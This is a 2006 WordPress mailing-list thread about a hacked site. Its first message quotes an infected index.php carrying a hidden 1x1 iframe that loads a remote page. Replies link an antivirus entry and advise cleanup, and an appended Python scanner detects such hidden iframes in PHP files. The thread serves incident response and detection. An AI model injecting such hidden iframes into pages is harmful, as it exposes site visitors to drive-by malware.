hack in the loose, or old stuff?

hack in the loose, or old stuff?

Denis de Bernardy
Has anyone come across something along these lines before?


<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-header.php');
?> <iframe src="http://196.regvista.com/index.php?ref=r22" width=1 height=1
marginheight=0 marginwidth=0 scrolling=auto border="0" noresize
style='display:none;'></iframe>


Denis

_______________________________________________
wp-hackers mailing list
[hidden email]
http://lists.automattic.com/mailman/listinfo/wp-hackers

Re: hack in the loose, or old stuff?

Andy Skelton
On 4/10/06, Denis de Bernardy <[hidden email]> wrote:
> Has anyone come across something along these lines before?
>

No, and it looks bad.

Re: hack in the loose, or old stuff?

Kaf Oseo
http://www.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html

See the technical details for sites which *may* contain the files
for the exploit.

-Kaf

RE: hack in the loose, or old stuff?

Denis de Bernardy
yeah, that would probably be the src file of the iframe. a grep on the
server revealed that pretty much every php file had been modified, hence my
posting the question over here.

Oh well...
D.


> -----Original Message-----
> From: [hidden email]
> [mailto:[hidden email]] On Behalf Of Kaf Oseo
> Sent: Monday, April 10, 2006 4:16 PM
> To: [hidden email]
> Subject: Re: [wp-hackers] hack in the loose, or old stuff?
>
>
> http://www.symantec.com/avcenter/venc/data/bloodhound.exploit.56.html
>
> See the technical details for sites which *may* contain the
> files for the exploit.
>
> -Kaf

Re: hack in the loose, or old stuff?

Robert Deaton
On 4/10/06, Denis de Bernardy <[hidden email]> wrote:
> yeah, that would probably be the src file of the iframe. a grep on the
> server revealed that pretty much every php file had been modified, hence my
> posting the question over here.
>

Now might be a _great_ time to start changing passwords, cleaning
files, scanning for rootkits, fixing file permissions, etc.

--
--Robert Deaton
http://somethingunpredictable.com
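
Added example, not posted by anyone in this thread: a Python scan that lists every .php file under a directory carrying a hidden iframe with a remote src, the pattern shown in the first message. The host injected.example.invalid, the two sample files and the "hidden" heuristics (width or height of 0 or 1, display:none, visibility:hidden) are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")
# Constructed samples modelled on the file quoted in the thread (placeholder host).
INFECTED = """<?php
require('./wp-blog-header.php');
?> <iframe src="http://injected.example.invalid/index.php?ref=x" width=1 height=1
marginheight=0 marginwidth=0 scrolling=auto border="0" noresize
style='display:none;'></iframe>
"""
CLEAN = "<?php\nrequire('./wp-blog-header.php');\n?>\n"

def iframe_attrs(tag):
    """Return the tag's attributes as a lowercase-keyed dict, quotes stripped."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag)}

def is_hidden(attrs):
    """True when the iframe is sized or styled so a visitor never sees it."""
    tiny = any(attrs.get(k, "").rstrip("px") in ("0", "1") for k in ("width", "height"))
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style

def hidden_iframes(source):
    """Return the src of every hidden iframe in source that loads a remote URL."""
    hits = []
    for tag in IFRAME_RE.findall(source):
        attrs = iframe_attrs(tag)
        if is_hidden(attrs) and re.match(r"(?i)(https?:)?//", attrs.get("src", "")):
            hits.append(attrs["src"])
    return hits

def scan_tree(root):
    """Map each .php file under root to the hidden-iframe sources found in it."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        hits = hidden_iframes(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path.relative_to(root))] = hits
    return report

def demo():
    """Scan a temp directory holding the two constructed files above."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(INFECTED, encoding="utf-8")
        Path(root, "wp-login.php").write_text(CLEAN, encoding="utf-8")
        return scan_tree(root)
```

A hit only shows which files carry the markup; restoring them from a known-good copy of the release and the cleanup steps listed in the last reply still apply.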
